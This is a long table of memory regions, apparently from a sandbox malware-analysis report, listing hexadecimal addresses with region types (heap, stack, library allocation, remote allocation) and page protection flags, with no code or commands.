7FFD342B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2819F2CB000
|
heap
|
page read and write
|
||
|
1F5003F7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343A0000
|
trusted library allocation
|
page read and write
|
||
|
3FD7BFE000
|
stack
|
page read and write
|
||
|
218DC0D1000
|
heap
|
page read and write
|
||
|
281872D3000
|
trusted library allocation
|
page read and write
|
||
|
36AD000
|
stack
|
page read and write
|
||
|
1F505E37000
|
trusted library allocation
|
page read and write
|
||
|
218DA261000
|
heap
|
page read and write
|
||
|
193BFFE000
|
unkown
|
page readonly
|
||
|
3FD81FE000
|
stack
|
page read and write
|
||
|
7FFD34360000
|
trusted library allocation
|
page read and write
|
||
|
1F504D05000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343D0000
|
trusted library allocation
|
page read and write
|
||
|
218DA240000
|
heap
|
page read and write
|
||
|
218DA41D000
|
heap
|
page read and write
|
||
|
7FFD34330000
|
trusted library allocation
|
page read and write
|
||
|
281873E9000
|
trusted library allocation
|
page read and write
|
||
|
218DA266000
|
heap
|
page read and write
|
||
|
11BAAF90000
|
trusted library section
|
page readonly
|
||
|
11BAA600000
|
heap
|
page read and write
|
||
|
1F505256000
|
trusted library allocation
|
page read and write
|
||
|
D1B953B000
|
stack
|
page read and write
|
||
|
38D83B7000
|
stack
|
page read and write
|
||
|
28185550000
|
heap
|
page read and write
|
||
|
7FFD342A2000
|
trusted library allocation
|
page read and write
|
||
|
193B9FB000
|
stack
|
page read and write
|
||
|
7FFD342E0000
|
trusted library allocation
|
page read and write
|
||
|
38D920B000
|
stack
|
page read and write
|
||
|
11BAF3B0000
|
trusted library allocation
|
page read and write
|
||
|
218DC0C2000
|
heap
|
page read and write
|
||
|
11BAF3D0000
|
trusted library allocation
|
page read and write
|
||
|
218DA1FE000
|
heap
|
page read and write
|
||
|
11BAF461000
|
heap
|
page read and write
|
||
|
11BAF4C6000
|
heap
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page read and write
|
||
|
193BD7E000
|
stack
|
page read and write
|
||
|
11BA9E90000
|
heap
|
page read and write
|
||
|
1F505590000
|
trusted library allocation
|
page read and write
|
||
|
28196F42000
|
trusted library allocation
|
page read and write
|
||
|
218DA415000
|
heap
|
page read and write
|
||
|
D05000
|
heap
|
page read and write
|
||
|
11BAF670000
|
trusted library allocation
|
page read and write
|
||
|
2819F32A000
|
heap
|
page read and write
|
||
|
281872E7000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E5B000
|
heap
|
page read and write
|
||
|
218DA216000
|
heap
|
page read and write
|
||
|
11BAAE80000
|
trusted library allocation
|
page read and write
|
||
|
11BAA5E1000
|
trusted library allocation
|
page read and write
|
||
|
D1B8E7E000
|
stack
|
page read and write
|
||
|
11BA9DE0000
|
heap
|
page read and write
|
||
|
11BAF3A0000
|
trusted library allocation
|
page read and write
|
||
|
1F504026000
|
trusted library allocation
|
page read and write
|
||
|
218DC0C2000
|
heap
|
page read and write
|
||
|
2819F58F000
|
heap
|
page read and write
|
||
|
193BB7E000
|
stack
|
page read and write
|
||
|
218DA20C000
|
heap
|
page read and write
|
||
|
218DA1FC000
|
heap
|
page read and write
|
||
|
11BA9E7E000
|
heap
|
page read and write
|
||
|
1F505EB5000
|
trusted library allocation
|
page read and write
|
||
|
218DA1F7000
|
heap
|
page read and write
|
||
|
46B000
|
remote allocation
|
page execute and read and write
|
||
|
218DA1E2000
|
heap
|
page read and write
|
||
|
218DA410000
|
heap
|
page read and write
|
||
|
11BAA602000
|
heap
|
page read and write
|
||
|
1F50527C000
|
trusted library allocation
|
page read and write
|
||
|
E1C000
|
heap
|
page read and write
|
||
|
7FFD34310000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34279000
|
trusted library allocation
|
page read and write
|
||
|
281852B0000
|
heap
|
page read and write
|
||
|
7FFD34271000
|
trusted library allocation
|
page read and write
|
||
|
281872A8000
|
trusted library allocation
|
page read and write
|
||
|
2819F270000
|
heap
|
page read and write
|
||
|
193C6FE000
|
unkown
|
page readonly
|
||
|
1070000
|
heap
|
page read and write
|
||
|
1F504B86000
|
trusted library allocation
|
page read and write
|
||
|
28185555000
|
heap
|
page read and write
|
||
|
218DA21B000
|
heap
|
page read and write
|
||
|
38D873B000
|
stack
|
page read and write
|
||
|
193BF7E000
|
stack
|
page read and write
|
||
|
365F000
|
stack
|
page read and write
|
||
|
281852E0000
|
heap
|
page read and write
|
||
|
2819F450000
|
heap
|
page read and write
|
||
|
11BAF42C000
|
heap
|
page read and write
|
||
|
11BAF740000
|
remote allocation
|
page read and write
|
||
|
11BAF48D000
|
heap
|
page read and write
|
||
|
28186FF9000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E95000
|
heap
|
page read and write
|
||
|
7FFD342F0000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E2B000
|
heap
|
page read and write
|
||
|
281853CF000
|
heap
|
page read and write
|
||
|
33FE000
|
stack
|
page read and write
|
||
|
38D910E000
|
stack
|
page read and write
|
||
|
1F505933000
|
trusted library allocation
|
page read and write
|
||
|
11BAF43F000
|
heap
|
page read and write
|
||
|
218DA418000
|
heap
|
page read and write
|
||
|
218DA1F7000
|
heap
|
page read and write
|
||
|
D1B8D7E000
|
stack
|
page read and write
|
||
|
28185535000
|
heap
|
page read and write
|
||
|
11BAF4F7000
|
heap
|
page read and write
|
||
|
11BAAF80000
|
trusted library section
|
page readonly
|
||
|
3FD775A000
|
stack
|
page read and write
|
||
|
10E0000
|
heap
|
page read and write
|
||
|
37AB000
|
stack
|
page read and write
|
||
|
11BAF390000
|
trusted library allocation
|
page read and write
|
||
|
218DA1BA000
|
heap
|
page read and write
|
||
|
11BAF740000
|
remote allocation
|
page read and write
|
||
|
218DC0C2000
|
heap
|
page read and write
|
||
|
11BAA991000
|
trusted library allocation
|
page read and write
|
||
|
28185327000
|
heap
|
page read and write
|
||
|
DEC000
|
heap
|
page read and write
|
||
|
28186FFC000
|
trusted library allocation
|
page read and write
|
||
|
11BA9F00000
|
heap
|
page read and write
|
||
|
3FD7DFE000
|
stack
|
page read and write
|
||
|
2819F370000
|
heap
|
page execute and read and write
|
||
|
7FFD340DC000
|
trusted library allocation
|
page read and write
|
||
|
11BAAF60000
|
trusted library section
|
page readonly
|
||
|
11BAF380000
|
trusted library allocation
|
page read and write
|
||
|
28196ED1000
|
trusted library allocation
|
page read and write
|
||
|
281871FC000
|
trusted library allocation
|
page read and write
|
||
|
193BDFE000
|
unkown
|
page readonly
|
||
|
7FFD34290000
|
trusted library allocation
|
page execute and read and write
|
||
|
E0A000
|
heap
|
page read and write
|
||
|
DFB000
|
heap
|
page read and write
|
||
|
218DA41C000
|
heap
|
page read and write
|
||
|
D4B000
|
stack
|
page read and write
|
||
|
2818536B000
|
heap
|
page read and write
|
||
|
3FD7AFE000
|
stack
|
page read and write
|
||
|
28186D20000
|
heap
|
page read and write
|
||
|
7FFD34275000
|
trusted library allocation
|
page read and write
|
||
|
1F504E61000
|
trusted library allocation
|
page read and write
|
||
|
7FFD343C0000
|
trusted library allocation
|
page read and write
|
||
|
218DC0B1000
|
heap
|
page read and write
|
||
|
28186F6E000
|
trusted library allocation
|
page read and write
|
||
|
38D80F9000
|
stack
|
page read and write
|
||
|
E23000
|
heap
|
page read and write
|
||
|
28186D10000
|
heap
|
page readonly
|
||
|
7FFD340D0000
|
trusted library allocation
|
page read and write
|
||
|
28186EB0000
|
trusted library allocation
|
page read and write
|
||
|
D1B8CFE000
|
stack
|
page read and write
|
||
|
38D817E000
|
stack
|
page read and write
|
||
|
218DA21C000
|
heap
|
page read and write
|
||
|
218DA279000
|
heap
|
page read and write
|
||
|
218DA1CD000
|
heap
|
page read and write
|
||
|
218DA1F7000
|
heap
|
page read and write
|
||
|
38D843C000
|
stack
|
page read and write
|
||
|
2BCE000
|
stack
|
page read and write
|
||
|
38D84BC000
|
stack
|
page read and write
|
||
|
7FFD341E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
11BAF4F9000
|
heap
|
page read and write
|
||
|
1F502CBB000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E13000
|
heap
|
page read and write
|
||
|
11BAF670000
|
trusted library allocation
|
page read and write
|
||
|
467000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD34170000
|
trusted library allocation
|
page read and write
|
||
|
38D7D6F000
|
stack
|
page read and write
|
||
|
28196EE0000
|
trusted library allocation
|
page read and write
|
||
|
193BAFE000
|
unkown
|
page readonly
|
||
|
7FFD340CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
281854B0000
|
heap
|
page read and write
|
||
|
7FFD34340000
|
trusted library allocation
|
page read and write
|
||
|
193B6FE000
|
unkown
|
page readonly
|
||
|
D1B8DFF000
|
stack
|
page read and write
|
||
|
11BA9EA3000
|
heap
|
page read and write
|
||
|
2819F336000
|
heap
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
28186F29000
|
trusted library allocation
|
page read and write
|
||
|
28187104000
|
trusted library allocation
|
page read and write
|
||
|
2819F308000
|
heap
|
page read and write
|
||
|
218DC0B4000
|
heap
|
page read and write
|
||
|
193AC7B000
|
stack
|
page read and write
|
||
|
11BAF680000
|
trusted library allocation
|
page read and write
|
||
|
11BAF4BF000
|
heap
|
page read and write
|
||
|
1F505EF1000
|
trusted library allocation
|
page read and write
|
||
|
281873B8000
|
trusted library allocation
|
page read and write
|
||
|
2B8F000
|
stack
|
page read and write
|
||
|
11BAF400000
|
heap
|
page read and write
|
||
|
11BAF3B1000
|
trusted library allocation
|
page read and write
|
||
|
11BA9F02000
|
heap
|
page read and write
|
||
|
281872C0000
|
trusted library allocation
|
page read and write
|
||
|
11BAF310000
|
trusted library allocation
|
page read and write
|
||
|
11BAA550000
|
trusted library allocation
|
page read and write
|
||
|
2819F2C9000
|
heap
|
page read and write
|
||
|
2819F58A000
|
heap
|
page read and write
|
||
|
7FFD340C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
11BAF600000
|
trusted library allocation
|
page read and write
|
||
|
193C0FE000
|
unkown
|
page readonly
|
||
|
11BAF320000
|
trusted library allocation
|
page read and write
|
||
|
34FD000
|
stack
|
page read and write
|
||
|
1F50559E000
|
trusted library allocation
|
page read and write
|
||
|
DEA000
|
heap
|
page read and write
|
||
|
355E000
|
stack
|
page read and write
|
||
|
1F509955000
|
trusted library allocation
|
page read and write
|
||
|
1F5054B7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD340C4000
|
trusted library allocation
|
page read and write
|
||
|
1F50552E000
|
trusted library allocation
|
page read and write
|
||
|
2818745F000
|
trusted library allocation
|
page read and write
|
||
|
D1B90FE000
|
stack
|
page read and write
|
||
|
38D827E000
|
stack
|
page read and write
|
||
|
28185530000
|
heap
|
page read and write
|
||
|
218DA1D4000
|
heap
|
page read and write
|
||
|
7FFD34176000
|
trusted library allocation
|
page read and write
|
||
|
1F500222000
|
trusted library allocation
|
page read and write
|
||
|
11BA9E7B000
|
heap
|
page read and write
|
||
|
218DC0C2000
|
heap
|
page read and write
|
||
|
1F504C24000
|
trusted library allocation
|
page read and write
|
||
|
38D85BF000
|
stack
|
page read and write
|
||
|
D1B8EFC000
|
stack
|
page read and write
|
||
|
193B2FE000
|
unkown
|
page readonly
|
||
|
7FFD34280000
|
trusted library allocation
|
page execute and read and write
|
||
|
11BAF65E000
|
trusted library allocation
|
page read and write
|
||
|
1F505D41000
|
trusted library allocation
|
page read and write
|
||
|
28186D00000
|
trusted library allocation
|
page read and write
|
||
|
218DC0BE000
|
heap
|
page read and write
|
||
|
28185323000
|
heap
|
page read and write
|
||
|
218DA160000
|
heap
|
page read and write
|
||
|
38D7CE3000
|
stack
|
page read and write
|
||
|
1F5003F3000
|
trusted library allocation
|
page read and write
|
||
|
D1B8C73000
|
stack
|
page read and write
|
||
|
218DA20C000
|
heap
|
page read and write
|
||
|
1F500466000
|
trusted library allocation
|
page read and write
|
||
|
218DC0B1000
|
heap
|
page read and write
|
||
|
11BAF3D0000
|
trusted library allocation
|
page read and write
|
||
|
218DA1B9000
|
heap
|
page read and write
|
||
|
193AFF7000
|
stack
|
page read and write
|
||
|
11BA9E79000
|
heap
|
page read and write
|
||
|
218DA23F000
|
heap
|
page read and write
|
||
|
218DA1F7000
|
heap
|
page read and write
|
||
|
38D853E000
|
stack
|
page read and write
|
||
|
193C07E000
|
stack
|
page read and write
|
||
|
218DA190000
|
heap
|
page read and write
|
||
|
28186EED000
|
trusted library allocation
|
page read and write
|
||
|
218DA1FF000
|
heap
|
page read and write
|
||
|
E2A000
|
heap
|
page read and write
|
||
|
218DA208000
|
heap
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
11BAF4C1000
|
heap
|
page read and write
|
||
|
11BAF4F0000
|
heap
|
page read and write
|
||
|
2819F327000
|
heap
|
page read and write
|
||
|
3FD82FE000
|
stack
|
page read and write
|
||
|
11BAF458000
|
heap
|
page read and write
|
||
|
38D7DEE000
|
stack
|
page read and write
|
||
|
11BA9DF0000
|
heap
|
page read and write
|
||
|
193C5FE000
|
stack
|
page read and write
|
||
|
10DE000
|
stack
|
page read and write
|
||
|
281852A0000
|
heap
|
page read and write
|
||
|
38D928B000
|
stack
|
page read and write
|
||
|
218DA130000
|
heap
|
page read and write
|
||
|
D1B91BE000
|
stack
|
page read and write
|
||
|
281872F9000
|
trusted library allocation
|
page read and write
|
||
|
11BAB310000
|
trusted library allocation
|
page read and write
|
||
|
218DC0D1000
|
heap
|
page read and write
|
||
|
28186FE5000
|
trusted library allocation
|
page read and write
|
||
|
28185371000
|
heap
|
page read and write
|
||
|
D1B93BE000
|
stack
|
page read and write
|
||
|
193C4FE000
|
unkown
|
page readonly
|
||
|
2818730B000
|
trusted library allocation
|
page read and write
|
||
|
11BAF4DF000
|
heap
|
page read and write
|
||
|
38D807E000
|
stack
|
page read and write
|
There are 450 hidden memdumps, click here to show them.